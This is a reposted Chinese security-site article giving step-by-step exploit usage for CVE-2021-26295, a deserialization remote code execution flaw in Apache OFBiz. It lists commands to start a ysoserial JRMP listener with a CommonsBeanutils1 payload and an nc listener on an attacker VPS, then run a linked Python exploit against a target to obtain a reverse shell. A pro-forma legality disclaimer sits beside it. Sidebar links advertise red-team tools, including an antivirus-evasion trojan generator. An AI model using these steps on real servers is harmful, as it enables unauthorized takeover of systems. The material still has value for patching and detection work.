CVE-2021-26295 EXP

admin

102359
文章

87
评论

2021年3月25日11:51:42评论678 views字数 411阅读1分22秒阅读模式

CVE-2021-26295

CVE-2021-26295 EXP可成功反弹壳牌

本文以及工具仅限于技术共享，不能用于非法用途，否则会导致一切后果自行承担。

Apache OFBiz 序列化远程代码执行漏洞

触发命令执行EXP

1. VPS启动`RMI`监听`9999`端口

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 ' [要执行的命令] '

2. VPS启动`nc`监听`64444`端口

nc -lvp 64444

3.执行python脚本

python3 cve-2021-26295_exp.py <目标>  < vps_ip >  < vps_port >

示例

CVE-2021-26295 EXP

可以利用

https://github.com/r0ckysec/CVE-2021-26295/blob/main/cve-2021-26295_exp.py

CVE-2021-26295 EXP

本文始发于微信公众号（Ots安全）：CVE-2021-26295 EXP

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2021年3月25日11:51:42
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
CVE-2021-26295 EXPhttps://cn-sec.com/archives/299487.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

CVE-2021-26295 EXP

CVE-2021-26295

触发命令执行EXP

1. VPS启动`RMI`监听`9999`端口

2. VPS启动`nc`监听`64444`端口

3.执行python脚本

示例

歪脖子技能树 - DY直播工具V1.0

dirsearch_bypass403:目录扫描+JS文件中提取URL和子域+403状态绕过+指纹识别工具

内网穿透工具 nc

开源、离线、免费商用的大模型知识库:Langchain-Chatchat

CS插件乱码

403绕过目录扫描工具

【GitHub精选】红蓝功防资料汇总

工具 | navgix

红队免杀木马自动生成器 | Qianji

RustScan 一款3秒内可扫描65k个端口的探测工具|漏洞挖掘

发表评论

在线咨询

微信

CVE-2021-26295

触发命令执行EXP

1. VPS启动RMI监听9999端口

2. VPS启动nc监听64444端口

3.执行python脚本

示例

发表评论

在线咨询

微信

1. VPS启动`RMI`监听`9999`端口

2. VPS启动`nc`监听`64444`端口